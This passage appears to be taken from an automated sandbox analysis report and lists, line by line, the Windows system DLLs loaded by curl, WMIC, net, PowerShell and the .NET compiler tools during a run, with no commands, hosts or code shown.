        Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
